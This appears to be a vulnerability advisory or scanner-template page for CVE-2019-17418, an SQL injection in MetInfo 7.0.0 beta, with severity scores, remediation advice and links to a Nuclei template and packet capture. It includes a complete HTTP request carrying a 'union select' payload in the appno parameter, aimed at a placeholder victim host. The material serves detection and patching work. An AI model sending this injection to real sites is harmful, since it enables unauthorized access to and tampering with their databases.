| Title | MetInfo 7.0.0 beta - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. |
| CVSS Score | 7.2 |
| EPSS Score | 0.9357 |
| CVE ID | CVE-2019-17418 |
| CWE ID | CWE-89 |
| Tags | cve cve2019 metinfo sqli vuln |
MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).
GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17418.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-17418.pcap
N/AN/A